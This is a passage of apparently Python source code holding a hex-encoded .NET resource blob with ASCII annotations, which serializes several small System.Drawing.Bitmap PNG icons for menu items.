        '65006E0075005F00700072006500730065006E0074002E0049006D006100670065008C1B0000' # e.n.u._.p.r.e.s.e.n.t...I.m.a.g.e.....
        '3463006F006E0074006500780074006D0065006E0075005F00730065007400740069006E0067' # 4c.o.n.t.e.x.t.m.e.n.u._.s.e.t.t.i.n.g
        '0073002E0049006D006100670065006D1F0000400001000000FFFFFFFF01000000000000000C' # .s...I.m.a.g.e.m...@..................
        '020000005153797374656D2E44726177696E672C2056657273696F6E3D322E302E302E302C20' # ....QSystem.Drawing,.Version=2.0.0.0,.
        '43756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D623033663566' # Culture=neutral,.PublicKeyToken=b03f5f
        '3766313164353061336105010000001553797374656D2E44726177696E672E4269746D617001' # 7f11d50a3a......System.Drawing.Bitmap.
        '000000044461746107020200000009030000000F03000000100100000289504E470D0A1A0A00' # ....Data......................PNG.....
        '00000D49484452000000100000001008060000001FF3FF610000000467414D410000B18F0BFC' # ...IHDR................a....gAMA......
        '61050000001974455874536F6674776172650041646F626520496D616765526561647971C965' # a.....tEXtSoftware.Adobe.ImageReadyq.e
        '3C000000A249444154384F63F8FFFF3F45184CA4B4BD3990DAFEF67F5AC7BB34104D0C1BA407' # <....IDAT8Oc...?E.L...9.....Z..4.M....
        '6E406CFD13B0042918A4076E003605C460B801AEE967487601480FDC00CBE87D241B00D20337' # n@l....)...n.6..`....gHv.H.....}$....7
        '009B026230DC00358F3524BB00A4076E8092CB6A920D00E9811B804D0131186E80BAE70E925D' # ...b0..5.5$....n...j.......M.1.n.....]
        '00D2033740D7FF28C90680F4C00DC0A680180C37C026EE3EC92E00E9811BE098FCE28063F24B' # ...7@..(...........7.&.>...........c.K
        'B021209A38F60B4466221FFF6700006B9176AD1E7757250000000049454E44AE4260820B4000' # .!..8..Df"..g..k.v..wW%....IEND.B`..@.
        '01000000FFFFFFFF01000000000000000C020000005153797374656D2E44726177696E672C20' # .....................QSystem.Drawing,.
        '56657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C' # Version=2.0.0.0,.Culture=neutral,.Publ
        '69634B6579546F6B656E3D623033663566376631316435306133610501000000155379737465' # icKeyToken=b03f5f7f11d50a3a......Syste
        '6D2E44726177696E672E4269746D617001000000044461746107020200000009030000000F03' # m.Drawing.Bitmap.....Data.............
        '000000FC0200000289504E470D0A1A0A0000000D49484452000000100000001008060000001F' # .........PNG........IHDR..............
        'F3FF610000000467414D410000B18F0BFC61050000001974455874536F667477617265004164' # ..a....gAMA......a.....tEXtSoftware.Ad
        '6F626520496D616765526561647971C9653C0000028E49444154384F8D926D48535118C7CF27' # obe.ImageReadyq.e<....IDAT8O..mHSQ...'
        '13F24341E587EA5396AE54B435758A4D7251BE81B369CCCD9C36BB99CBD2CD740A5A6859A168' # ..CA...S..T.5u.MrQ...i...6.....t.ZhY.h
        'BE646AAF6669A5A9A11586042568EE862F4199841889505F8A301305FF9D73CC3BC1842EFCEE' # .dj.fi......%h../A....P_.0....s.;.....
        '3DFCCF737ECFE5DE8700E0548710096B98CC49ABD5C65084BFC4B06C794D956A91E5825A8AC8' # =..s~......T...k..I...P....lyM.j...Z..
        'B8E04B861A72D2A7C6C63E81C1D62C5BDA67B52B04952A227EAC4E46C7C940F4F58D60707014' # ..K..r....>...,[.g.+..*"~.NF..@...`pp.
        'E3E3931CB66619DBFB506904ABA5106B22BD2D09CA8389F8AECC80BB899EA83FEC863B093BD1' # .....f...Pi....k".-............?..;.;.
        '74D4070F5276A3D1E8859BF1EEB897E48DE1D278B05AD32923D1E6E73B04A581441C2AD1A1F7' # t...Rv.............x.Z.)#...;...D.*...
        '6C149E594238D7B23428CBD649D41424E1C67901165DE0677A58A0444982CB01447C7B290E2F' # l..YB8..4(..I..$..y..].gzX.DI...D|{)./
        'F30E4A54E419E816B0F00FD8159D9B9B2A098A1544EC2FD2A0FB4C28EA6DB1B862D323CB26E0' # ..JT............*...D./...L(.m..b.#.&.
        'F9C000B4E5761CB96A87B1C68ED4EB76D4BD18C5FCC202222C963449502827227BFDAE8CBD28' # .....v..j......v.......",.4IP('"{....(
        'C98AA3D1EA9D1B7BFAF16B7E1EFBCDE6744950E04344F6DAADA97EC817C27987E1B64D9C9176' # .......{..k~....tIP.CD....~...y...M..v
        '578C7450E893E5154FBAF17D7616C126538624C8F324E2D34C156EE93D909DA4E61D2E1E57E0' # W.tP....O..}v..&S.$..$..L.n.=.......W.
        '7D9707BEBC96E1C7841A536FBC796E6BEAC1D79919F8E9F55649902D23625B5A006E1B64B01A' # }.........So.ynk........VI.-#b[Z.n.d..
        '4379079DFF469C4B74434795377E4FA760F45530CFEB3A3BF16D6E0E5E1A4D8E24C8DC41C4C7' # Cy...F.KtCG.7~O.`.U0..:;.mn.^.M.$..A..
        '54D040E72023611FEF70BF682DA7B9D805BDADEBD052E2C273A53AE8E70685A2D055A94C9604' # T.@..#a..p.h-........R..s.:......U.L..
        'E9DBA8E0843F1F1673BC8A77989C9E5E01CB2383764D6EF1F12454E2182461EBA2A0D9E48BD3' # .....?..s..w...^..#.vMn..$T..$a.......
        '87E43044AC42A41C6A0FD789E8EDEB4990FB668720761D11DBCD4AFE175AE8C77B24EC917878' # ..0D.B..j......I..f..v....J..Z..{$..xx
        '4CCE6163CD60B51476C621085B436A0F3811F17F60B5E1CE84843B13F2078F6A56FE4EA4B3EB' # L.ac.`..v.!.[Cj.8...`.....;....jV.N...
        '0000000049454E44AE4260820B400001000000FFFFFFFF01000000000000000C020000005153' # ....IEND.B`..@......................QS
        '797374656D2E44726177696E672C2056657273696F6E3D322E302E302E302C2043756C747572' # ystem.Drawing,.Version=2.0.0.0,.Cultur
        '653D6E65757472616C2C205075626C69634B6579546F6B656E3D623033663566376631316435' # e=neutral,.PublicKeyToken=b03f5f7f11d5
        '3061336105010000001553797374656D2E44726177696E672E4269746D617001000000044461' # 0a3a......System.Drawing.Bitmap.....Da
        '746107020200000009030000000F030000007A0200000289504E470D0A1A0A0000000D494844' # ta................z.....PNG........IHD
        '52000000100000001008060000001FF3FF610000000467414D410000B18F0BFC610500000019' # R................a....gAMA......a.....
        '74455874536F6674776172650041646F626520496D616765526561647971C9653C0000020C49' # tEXtSoftware.Adobe.ImageReadyq.e<....I
        '444154384FA5914D6B13511486EF3E7F20BF201031268351820D35D6C80462078618310B858A' # DAT8O..Mk.Q...>.....1&.Q..5...b...1...
        '465114A9544B41AAA254454551510489B8E842E2A2452BA1455ABF826612F3413E914024110C' # FQ..TKA..TEEQQ....B..E+.EZ..f..A>.@$..
        '5850115D88AFF71D698812A4EAE26166CE3DCF7BEFB923C2E1F0A024FA8F0C8A5028B4A7DD6E' # XP.]....i.....af.=.{..#....$....P(...n
        'A3D56AFD1574E80A5DD7F7369B4DAC198D63F5F8AC89FBF81CD69E7C04CFA979F44D3C41FFB9' # ..j..t..]..6.M...c.........|...y.M<A..
        'E7D870E105FC970C04AE6611BE61800E5DA169DABE46A301E5580243F7DE2D0BFD561574E88A' # ..p.......f..a..].i..F...X.C..-..V.t..
        '6030B8BF5EAF63E5E87D6CBD535F160CA04357A8AA7AA056ABC13E3285E0F54207F5CA2BF3D8' # `0..^.c..}l.S_...CW..z.V..>2...B...+..
        'DE334FB14E8ED177F619D65F7C09FFB51C34194087AEF0FBFD07CBE532561C99C6A6CB690CC8' # .3O.N..w..._|....4.@........2V.....i..
        '26CEED39BD604AFDF27B40CEADDE2C61F3EDD7D027DF60DBDDB7A04357F87CBE43854201ABC6' # &..9.`J..{@...,a....'.`....CW.|.C.B...
        '66E0E38EF2C27A4961397B647A11DB1F7EC2D0830FA0435778BDDEE16C360B45DEFE1FA5B9AF' # f.....zIa9{dz...~.....CWx...l6.E......
        'D835FF0DD1C7DF119DFD023A7485C7E3399C4EA71138BF808D72EE800CD064C016191091013B' # .5.........:t...9.N..8...r....d......;
        'A6DE63E7CC47EC4E7C3645329C58041DBAC2ED768F188681542A854C26837C3E8F62B1884AA5' # ..c..G.N|6E2.X.....v....T*.L&.|>.b..J.
        '826AF5E765F1592A95CC637367CA84AE501425E272B98EFE4E2C164337BD7AE80AF9229C4E67' # .j..e.Y*..csg...P.%.r...N,.C7.z...".Ng
        '0787C321EC76FB583C1E4737AC71ADBB97EE2F01B24958AD567222994C2297CB99E37044D6B8' # ...!.v.X<.G7.q..../..IX.Vr".L"....pD..
        'C69E9E01369B4D582C962526E43F9EEC86B5A575F6760200FC07103F0085774CF9F3F80DC300' # ....6.MX,.%&.?.....u.v.....?..wL......
        '00000049454E44AE4260820B400001000000FFFFFFFF01000000000000000C02000000515379' # ...IEND.B`..@......................QSy
        '7374656D2E44726177696E672C2056657273696F6E3D322E302E302E302C2043756C74757265' # stem.Drawing,.Version=2.0.0.0,.Culture
        '3D6E65757472616C2C205075626C69634B6579546F6B656E3D62303366356637663131643530' # =neutral,.PublicKeyToken=b03f5f7f11d50
        '61336105010000001553797374656D2E44726177696E672E4269746D61700100000004446174' # a3a......System.Drawing.Bitmap.....Dat
        '6107020200000009030000000F03000000670200000289504E470D0A1A0A0000000D49484452' # a................g.....PNG........IHDR
        '000000100000001008060000001FF3FF610000000467414D410000B18F0BFC61050000000970' # ................a....gAMA......a.....p
        '48597300000EC200000EC20115284A800000001974455874536F6674776172650041646F6265' # HYs..........(J.....tEXtSoftware.Adobe
        '20496D616765526561647971C9653C000001E449444154384FA58D4D48546114863F08347122' # .ImageReadyq.e<....IDAT8O..MHTa..?.4q"
        '492785DCD4225CB9998D8984B4E96E1431B41F9420A652411DBAA6B432FC0F44572DAE9814FD' # I'..."\.......n.1.....RA....2..DW-....
        '8144398D137AA3FC2909F5106220584C1618628CE34224AE139CCE7BB52F0431C1C573CFF77D' # .D9..z..)...b.XL..b..B$....{./.1..s..}
        'E77D9FAB98795FB89F43654F5552E90397038516B00423A1F89E4ABEF050792E3D76E7DF0C40' # .}...y_..CeOUR........#...J..Py.=v...@
        '6747C1C192FB4A8A0412CFF5197B157824600AB640E0EC449C313D171F1910C8B4B676C898E8' # gG....J......{.x$`..@..D.1=.......v...
        '6841CAE57EF3E4ED779133CF979C9C81289F0A463937B8C29593EB2C3B1290A1FCC118178496' # hA..~...w.3.....(..F97.....,;.........
        '9DEC96F71174B4E0E8B5A05DD4BFE06475CEACC99940FD8718637AAF0E1869FE174AA6853B32' # .....t.....]...du....@...cz...i..J..;2
        'E5A145071D2DC8AC19A6F34F3EF36109A45785DD3B38563D6448504180997AFDA50F992BC1EF' # ..E..-.....O>.a..W..;8V=dHPA..z....+..
        '8CBD169C681827FFB3AF9C5215A68C80AD8ED78F598221A1CD22A80829D903AA79B5C8E86841' # ....h.'....R........Y.!.."..)...y...hA
        '56E314D50EFFE423D5432440E8E20AE49E76E38DC2FB16D430166374B420BB7D966E4DAC736A' # V......#.C$@.....v......0.ct...}.nM.sj
        'E035092AA36E4465DE1C555EF3ED3F44821D328DD3BF181D2DF075CD53D34787E54F2461DFB6' # .5.*.nDe..U^..?D..2.....-.u.S.G..O$a..
        'E2767CC8B4CDC6191D2DC8B9FBCD6E9ED970FCE1E89AB76E84760399D64F71071D2DC8EBF961' # .v|......-....n..p.....n.v...Oq..-...a
        '960DAE463AE67E3BDD5F9877E38E64CAC3AB1174B4E074EF9227BF6FD9146C81FE0332263A5A' # ...F:.~;._.w..d....t..t..'.o..l...2&:Z
        'B01F767CDC3BACFE00833F400D8FBCF1D10000000049454E44AE4260820B400001000000FFFF' # ..v|.;....?@.........IEND.B`..@.......
        'FFFF01000000000000000C020000005153797374656D2E44726177696E672C2056657273696F' # ...............QSystem.Drawing,.Versio
        '6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B657954' # n=2.0.0.0,.Culture=neutral,.PublicKeyT
        '6F6B656E3D6230336635663766313164353061336105010000001553797374656D2E44726177' # oken=b03f5f7f11d50a3a......System.Draw
        '696E672E4269746D617001000000044461746107020200000009030000000F03000000800200' # ing.Bitmap.....Data...................
        '000289504E470D0A1A0A0000000D49484452000000100000001008060000001FF3FF61000000' # ...PNG........IHDR................a...
        '0467414D410000B18F0BFC61050000001974455874536F6674776172650041646F626520496D' # .gAMA......a.....tEXtSoftware.Adobe.Im
        '616765526561647971C9653C0000021249444154384FA5914168927118875FF0EC2110442F82' # ageReadyq.e<....IDAT8O..Ah.q.._..!.D/.
        '5D0A12BAE461E0561B4624841385C2D84196115130886A5D0A16EC302258AD22B244CA30302C' # ]....a.V.F$.....A..Q0.j]...0"X.".D.00,
        'C465468CE53E9B7391255F840533DD706A29CCDC075ABFBED7DA2DF88C5E786E0FEFFB7FF8D3' # .eF..>.s.%_..3.pj)...Z....-..^xn......
        'C0DD75723A9D5D5C2E9751E6888CB707D8337617381C8E2DDC8220E4F2F93C445144369B4526' # ..ur:.]\..Q......3v.8..-......<DQD6.E&
        'B384542A856452C0C2C26B08C21B2C2EE6303B9BCCB14F7BEF55BAD7ED763B73229148201E8F' # ..T*.dR...k...,..0;...O{.U...v;s".H...
        '23168B211A8D221289201C0E23140A21180C221008C0EFF7C3E7F341A55279BB0BE4A7749117' # #..!..".....#..!.."........A.Ry....t..
        '1DC73F0CFBB47F6AFEE8D08CB83C78EBF3CAC09DD5B6F7E9371C7BF2F5AF8C27EA481737D16E' # ..?....j.....<x.........7.{....'.H.7.n
        'B7D1E974C02FA67DD3EF97C705E9C764F6272E67DAB82448B830F71D632F36309AD8C0F0CB26' # ...t./.}.......d.'.g..$H.0..c/60.....&
        'FA5E6D627BBA8D1D2909679FD5D06AB52049126C36DB49EA9F160B7C75345283E77105238FD6' # .^mb{...).g...j..I.l6.I....|u4R..q.#..
        'E07E58C4E1FB2B70FA3F61D8F711876E8B3878E31D0E5C7F8BA1AB4B68341A68369BB05AADA7' # .~X...+p.?a....n.8x...\....Kh4.h6..Z..
        '69F066BEF027A9A7F184D751A95450AFD761B158C6A8FFDA8702F7709712EC8D8456512A9550' # i.f..'.....Q.TP..a.X.......p.....VQ*.P
        'AD5661369BCF50DF956C817BB84B09F6DC0F0A2897CBA8D56A30994CE769CF64FA0BF7709712' # .Va6..P..l.{.K.....(....j0.L.i.d...p..
        'ECED9AC874341ACD04A3D56A3DB4FBE27C917BB84B09F6D8D7E974A456AB495E42B4F3DCF322' # ....t4.....j=...|.{.K.....t.V.I^B...."
        'F7709712ECB12FB7937CFDF702E3A948897BB84B09F6D897DB8931180C44DBEC53736AC7CC5A' # .p..../..|.....H.{.K......1..D..Ssj..Z
        'AFB0AFD7EB690B92BFF63F00FD02D6F4D72DBEED798D0000000049454E44AE4260820B400001' # .....i....?......-..y.....IEND.B`..@..
        '000000FFFFFFFF01000000000000000C020000005153797374656D2E44726177696E672C2056' # ....................QSystem.Drawing,.V
        '657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69' # ersion=2.0.0.0,.Culture=neutral,.Publi
        '634B6579546F6B656E3D6230336635663766313164353061336105010000001553797374656D' # cKeyToken=b03f5f7f11d50a3a......System
        '2E44726177696E672E4269746D617001000000044461746107020200000009030000000F0300' # .Drawing.Bitmap.....Data..............
        '0000D70200000289504E470D0A1A0A0000000D49484452000000100000001008060000001FF3' # ........PNG........IHDR...............
        'FF610000000467414D410000B18F0BFC61050000001974455874536F6674776172650041646F' # .a....gAMA......a.....tEXtSoftware.Ado
        '626520496D616765526561647971C9653C0000026949444154384FA5935D48D36114C69FCDCD' # be.ImageReadyq.e<...iIDAT8O..]H.a.....
        'BE2C506BB56C3A9B435D51D066166906A5D0B7751144A4332A114CE8C68AA1D54559741139FA' # .,Pk.l:.C]Q.f.i....u.D.3*.L.....EYt.9.
        'A0F022888282515DD8C265493956E66C630B5C10AB6D51891032376DE8E93D6B93A9DD75F183' # .."...Q]..eI9V.lc.\..mQ..27m..=k...u..
        'F37FCEF33BBC377F10D17F010F748CD48B550D821702BBE099E098C8D3189E1319EFB8D3C00E' # ....;.7......t...U....................
        'BB70A1186EE88C3ED5D60F6357EE8ED2032B45DA3AC29FD4956E919F64788E5CEC08D37D2B71' # .p..n..>...cW....+E.:....n..dx.\...}+q
        '87BBECB00B278A240328B28D9EBB11FE6DBA4ED1432D143DDC4A63A6F671976CB583899EBA3A' # .....'.$.(......m.N.C-.=.Jc..q.l.....:
        'CE19EFB8336A3287D96117EF5198DE2FD3F58D5FB843C3BB9A687847639C91BA560A561D0D05' # ....3j2..a..Q../..._.C...hxGc...V.V...
        '2B8F84466A5BA672EE444D66EA4F2BEE63170E68656F255AC74853DB64A0BC96026535718215' # +..Fj[.r.DMf.O+.c..heo%Z.HS.d....e5q..
        '75F463CF8989EFBB1B278215C6A99C3B43079B27D96117BDD0E035344F7FD69C0E7F361CA024' # u.c......'.....;C..'.a....54O.....6..$
        '836BF7D1404115D973CAA9674949756719E2F4283690C7B03FCC0EBB78093563FAA8DFEB0F6D' # .k..@A..s..gI)ug...(6...?...x.5c.....m
        'AF27DF9A6A72AA2AA85794DF64EA67F14EB5991C4B4BFCECB00B1B72D1855C8D4D966FFFBAF3' # .'..jr.*.W..d.g.N...KK.....r..\.M.o...
        '78C4BD7C133945F15F0C2C5E4FAEFC2D912E699E3DEE0817CFA18AD38915C6EE8C42D7177D75' # x..|.9E._.,^O..-..i.=............B..}u
        'CC278A834248C5275EE4CB298BD9E42B5DDC4D7A78026512C963289B6D0B0ABCDFB4DB62A1EC' # .'..BH.'^..)...+].Mzx.e..c(.m......b..
        '120A09318E90038AD25857BADACB1DEE26BDD403B06099F4111467AC73F23CC3CA8DB15F4264' # ...1.....XW.....&....`....g.s.<...._Bd
        '86B2F431AB4CE5E11D77529D9907700FD9D2DB5864B2C815DE48E6BA09C622537839E31D7752' # ...1.L...wR...p....Xd....H...."Sx9..wR
        '9D691F8903B8867969972137DBE62AFD0CCF9CF16ED6815B5838C54D64A01DF37109729C8744' # .i.....yi.!7..*.....n..[X8.Md...q.r..D
        '791678C5F0CC19EFB893EA24FF463C8402A23C93FA04D372EEFEF574F803C04FB10F2023ED78' # y.x........$.F<...<....r...t...O...#.x
        '0000000049454E44AE4260820B400001000000FFFFFFFF01000000000000000C020000005153' # ....IEND.B`..@......................QS
        '797374656D2E44726177696E672C2056657273696F6E3D322E302E302E302C2043756C747572' # ystem.Drawing,.Version=2.0.0.0,.Cultur
        '653D6E65757472616C2C205075626C69634B6579546F6B656E3D623033663566376631316435' # e=neutral,.PublicKeyToken=b03f5f7f11d5
        '3061336105010000001553797374656D2E44726177696E672E4269746D617001000000044461' # 0a3a......System.Drawing.Bitmap.....Da
        '746107020200000009030000000F03000000AB0100000289504E470D0A1A0A0000000D494844' # ta......................PNG........IHD
        '52000000100000001008060000001FF3FF610000000467414D410000B18F0BFC610500000020' # R................a....gAMA......a.....
        '6348524D00007A26000080840000FA00000080E8000075300000EA6000003A98000017709CBA' # cHRM..z&..............u0...`..:....p..
        '513C0000013649444154384FA590AD4B436114C6CFBF30D8EADAEA60656D7160182CAC8E892B' # Q<...6IDAT8O...KCa....0....`emq`.,...+
        'AB63E0D6355834685150F00B5144B0088AC124A65730080A563158AC62F0F1795EBD4378CFC0' # .c..5X4hQP..QD....$.W0..V1X.b..y^.Cx..
        '8FF070EE39BFDF7D2E5C03F0AFB8C7DF64FCB06F668766534CD0D4BEFB158F79050201A31134' # ..p.9..}.\......d..of.fSL......y.....4
        'B57F2B88ECB5DF1FB3A48062781F0E71DB68E06D30807646254A78EE76237B6CB7234B0AB629' # ..+........bx..q.h.m0.vF%Jx.v#{l.#K..)
        '6E11BCF47AB8A856F1D4E940BB72D76CC6DB75BD1E6F72930202DB2058A7F0D06AE1B45CC655' # n...z..V...@.r.l..u..or.....X...j..\.U
        'AD86F34A059B85020E8A4588C991EB1650B0350AAB144F4A25ECE472317BF93C741393E3162C' # ...J......E.....P.5...OJ%..r1{.<t....,
        'F0B8C42C535AA17CCCAF1EF1E52CBA89C991EB162C7E0AE18C2F78119333A940205C52CCA27D' # ...,SZ.|.....,......,~.../x..3.@.\R..}
        'C22DFD8973043714B2689FA7A8782C2998A53820B8A7A0A99DA28A5D961410D80CC134054DED' # .-..s.7..h...x,)..8........]......4.M.
        '5981C79282BFC63DFE3CB00FB3670FD6C10B84B70000000049454E44AE4260820B4000010000' # Y......=.<...g..........IEND.B`..@....
        '00FFFFFFFF01000000000000000C020000005153797374656D2E44726177696E672C20566572' # ..................QSystem.Drawing,.Ver
        '73696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B' # sion=2.0.0.0,.Culture=neutral,.PublicK
        '6579546F6B656E3D6230336635663766313164353061336105010000001553797374656D2E44' # eyToken=b03f5f7f11d50a3a......System.D
        '726177696E672E4269746D617001000000044461746107020200000009030000000F03000000' # rawing.Bitmap.....Data................
        'C50200000289504E470D0A1A0A0000000D49484452000000100000001008060000001FF3FF61' # ......PNG........IHDR................a
        '0000000467414D410000B18F0BFC6105000000206348524D00007A26000080840000FA000000' # ....gAMA......a.....cHRM..z&..........
        '80E8000075300000EA6000003A98000017709CBA513C0000025049444154384FA58C5D685261' # ....u0...`..:....p..Q<...PIDAT8O..]hRa
        '18C74F9324AAD54DA3CD208C7DD864A1863359EDA3116D7360A3B69576B1697E8541C3252B06' # ..O.$..M....}.d..3Y...ms`...v.i~.A.%+.
        '115D6C591015ACA0B4A0185DC42A36B754B4CC085B19B6A0F223C3311AB450D8CEE94E793ACF' # .]lY.......].*6.T...[....#.1..P...Ny:.
        '4177B2D64DBDF07B79789EFFFF4700C07FC17C9C9A0982B36392E0885C34EE528ED8A3A3B949' # Aw..M..{yx...G....|.....c...\4.R.....I
        '339503671D73C30C66E9CE4A82D662B96F62AF291A335E4A2DF65FA73296112A63B0A5161B0D' # 3..g.s..f..J..b.ob.).3^J-._.2..*c.....
        '9118DE30F337416B49833F60BC9822F5C3DFA1C31229403FBC00DAA1057253FDB300667F138C' # ...0.7AkI.?`.."......)@?.....rS...f...
        '9715D7BA9CBAA16FA46A30098A13EFE975E13B75390678539F9D23D74B9F38B143AF7302E123' # .......o.j0.....u.;u9.xS..#.K.8.C.s..#
        'FD1ECD4CBCFBF46750F67D8436F30C5CBDFB81612A30CF08EC6349E676C81A839D87A7E3D859' # ...L...gP.}.6..\...a*0...cI.v........Y
        '1614091E38BACF24965A8E87214FB3EE35EC52F9C17A2100A15008066C5EA8D83F0602C56390' # ....8..$.Z..!O..5.R..z!..P..l^..?...c.
        'A99E2F61871554DE77AB0613997D86103469A741D2E90341FB24A8FB7D100ECFC0E8C32054B5' # ../a..T.w....}..4i.A...A.$..}.......T.
        '8D4395C2C940DF33D86105E5F73C5D03D1ECEE9E575073D00FC28EA7B05DE986783CCE50ADF4' # .C...@.3.a...<].....WPs......]..x<.P..
        '30BB3CA2AE40163BAC807FE776B3FE1D2956BD01D11196EA035E865F7788B0E325891D56B0F5' # 0.<..@.;....v...)V.......^._w...%..V..
        '96A9B2C597901F8B426D6F8441AC7A0BE9749A01E7FC1EE1D5BBBE6087156CB951B6669BDD25' # ........Bmo.A.z..t.........`..l.Q.f..%
        'D7C4A83AD33CD419BF82B4E7D3B20067DC2192A3118ACBB7BBB0C30A78234451E935C5BA0A47' # ...:.<.........g.!..........x#DQ.5...G
        '50A69DA51A4F2E42038D441D66C01991F626A9B5E58E2066B15328D87C8558B5F17C3BB7C4E6' # P....O.B..D.f....&.....f.S(.|.X..|;...
        'E5D7BB66659A39AAA9EF4716C1197778C30C6657166C3847105C2B8F586D31D38CD2BCC881B3' # ...fe.9...G...wx..fW.l8G.\+.Xm1.......
        '196F98F943F0EF00F113ECA941910DBFDB270000000049454E44AE4260820B400001000000FF' # .o..C.......A....'....IEND.B`..@......
        'FFFFFF01000000000000000C020000005153797374656D2E44726177696E672C205665727369' # ................QSystem.Drawing,.Versi
        '6F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B6579' # on=2.0.0.0,.Culture=neutral,.PublicKey
        '546F6B656E3D6230336635663766313164353061336105010000001553797374656D2E447261' # Token=b03f5f7f11d50a3a......System.Dra
        '77696E672E4269746D617001000000044461746107020200000009030000000F030000001D03' # wing.Bitmap.....Data..................
        '00000289504E470D0A1A0A0000000D49484452000000100000001008060000001FF3FF610000' # ....PNG........IHDR................a..
        '000467414D410000B18F0BFC61050000001974455874536F6674776172650041646F62652049' # ..gAMA......a.....tEXtSoftware.Adobe.I
        '6D616765526561647971C9653C000002AF49444154384F8D925B48936118C79F8BC80E181116' # mageReadyq.e<....IDAT8O..[H.a.........
        '2891D5855137655974933745A92094247A514BCB136AEAB0CC320F9B5B130FC372B4743A30CF' # (...Q7eYt.7E...$zQK..j...2..[...r.t:0.
        '666926E932B344415C96A594352C4D93DCD4799867E7BFEF7BA9AF565DF4C00FFEF03CEF8FFF' # fi&.2.DA\...5,M...y.g...{..V].....<...
        'C54B00182FD3289043F29F04EA1544BE494924083A14946A31A461E445008CCDE760E94E8175' # .K../.(.C.....D.II$.:..j1.a.E....`.N.u
        '301F18BE6B8BB114FC6DAC24C056D02E273926ABB062BE87F92F2A8CB54741A73E8A27F54A1B' # 0...k....m.$.V..'9&..b.../*..GA.>.'.J.
        '1A9FE64021F178CC3D0EE5F016046D325258C72BB03C52CCB08E57E2EDC368AC70CB7FC1CFA9' # ...@!.x.=.....m2RX.+.<R...W...h.p.....
        '84843041D022A5F465532996860B197CCE9085E0840AF0C9032E9400E1E540B11EA8ED069657' # ..0A."..eS)....|..............@......W
        '56E01D17172E089A93296BE95B1116060B187CCE977B4256A547DA033D24957A2496EB51D1D6' # V........)k.[.....|..{BV.G..=$.z$..Q..
        '0B830998B75AE12916470A82C644CA5EF8AAC5ECE73B0C3EB768FDFFAA5DF2AC03C669C0B2B4' # .....Z.).G...D.^.....;.>.h...]....i...
        '846311115182A021815473031A580C2A069FAB53ECF0FAFE660E07065F3BAF5E8751CB1CCC0B' # .c..Q..!.Ts..X.*...S....f..._;.^.Q....
        '0B700F0E160B82BA7852CF7E5263AA379BC1E71AE97AF435EF84A1713B3E3438B3DAF1653A54' # .p......xR.~Rc.7.....z.5...q;>48...e:T
        '1A16619A9BC36191285610D4C491C6F2F116267A32187C7E94B1058BD3FE18EB3D82A1D63DAC' # ..a...a.(V........&z2.|~........=...=.
        '768C568782AE650CCFCC60BF9F5F9C20A88A25EDD43B25C6BA140C3E57A7EFE0563298FA8330' # v.V...e...`.._....%..;%....>W...V2...0
        'D07288D5D6D4D561687A1A462EEFF2F24A100465D1543CD19D0E53A794C1E7A2ABAB31FCDE09' # .r.....ahz.F....J..e.T<...S.......1...
        '1DD50E68CADFC06A8B6244D82656C2C3C3B967939B5B9020C80DA15AF31B05463A921966AE85' # ...h...j.bD.&V....g..[.....Z...F:..f..
        'FAE22AB4D6DAA3F8C63ADCBEB496D5D6E45D067FAB0925F78DAEAEBFBE729688944D370F4EF6' # ..*......:.......]....%......r...M7.N.
        '35842D8EEA25187F2543A1D49DD5FD095FFBB4CFEE3EFE9693908D20F32C516E309D5407516E' # 5.-..%..%C......_....>.......,Qn0.T.Qn
        'C5B5ADCF3B4B7CFAAFF8DA0D7047F2DFB17771893CBE97C8FB00D11A47475B01F79872CE1329' # ....;K|.....pG...wq.<.......GG[...r..)
        '45B42FF30C5D4FF5A3DB44E4F407F61C3F86E83B9AE4A16C2B8271820000000049454E44AE42' # E./..]O...D.....?..;...l+.q.....IEND.B
        '60820B400001000000FFFFFFFF01000000000000000C020000005153797374656D2E44726177' # `..@......................QSystem.Draw
        '696E672C2056657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C' # ing,.Version=2.0.0.0,.Culture=neutral,
        '205075626C69634B6579546F6B656E3D62303366356637663131643530613361050100000015' # .PublicKeyToken=b03f5f7f11d50a3a......
        '53797374656D2E44726177696E672E4269746D61700100000004446174610702020000000903' # System.Drawing.Bitmap.....Data........
        '0000000F030000003E0300000289504E470D0A1A0A0000000D49484452000000100000001008' # ........>.....PNG........IHDR.........
        '060000001FF3FF610000000467414D410000B18F0BFC61050000001974455874536F66747761' # .......a....gAMA......a.....tEXtSoftwa
        '72650041646F626520496D616765526561647971C9653C000002D049444154384F4D926B4893' # re.Adobe.ImageReadyq.e<....IDAT8OM.kH.
        '6114C79FA72C9041480D3FF46188E8BC6CDE1882A1794944524486F84D45BC8C694626239CA3' # a....,.AH.?.a...l....yIDRD..ME..iF&#..
        '45A6E187422286085D408808CA192489641A9562738E799F69EEA2622EA7E2DDB59D9EF3BC6C' # E...B"..]@....$.d..bs.y.i..b.........l
        'F4E1C7FF7DFEE7BCFFE7E59C97FCA29463A7F4AA93D2772E4ADFCE51FA6C8C90FC1142C877A6' # ....}...........c.....w.J..Q.l....B.w.
        'D394BE70506AC43AF605DE0100429E6666120B3B303E405F1F9CB6B7C37645C5F68448646201' # ...pPj.:.....B.ff..;0>@_.....vE...Hdb.
        '133F4422B3A7AC6CE7B4B515FC4623601FF6DF080F1702943A1DB95559493E523A045D5DE029' # .?D"...l.....F#`........:..UYI>R:.]].)
        '2D85B99C1CB02524D8A1A30316E4723B9ED1F71B0C807DE972392132991050ACD516B110D563' # -.....%$......r;......}.r9!2..P......c
        '89C438CC6E0CD01F1ABAFEBF06782016BF0F4B4F6F6401C53CE04A75B5CAE7F783D7E7E3FC29' # ..8.n........x....KOod..<.Ju.........)
        '2901686BE3FA736D2DE8638F6D7393B3B2B30367E2E29A78C0E5BC3CD5EED111B83C1ECEA652' # ).hk..sm-.c.ms.....g...x...<.....<...R
        '09A0D773B52C2F077DECF96CB170AC4E279C954AEFF180F3292945214949AA378383F0920D71' # ...s.,/.}..l.p.N'..J....))E!II.7.....q
        '42A100BF4EC7F5494F0F3CEFED85D70303D0D1DD1DE49C54FA28242A4AC5032EB12D88B3B254' # B...N..IO.<............T.($*J....-...T
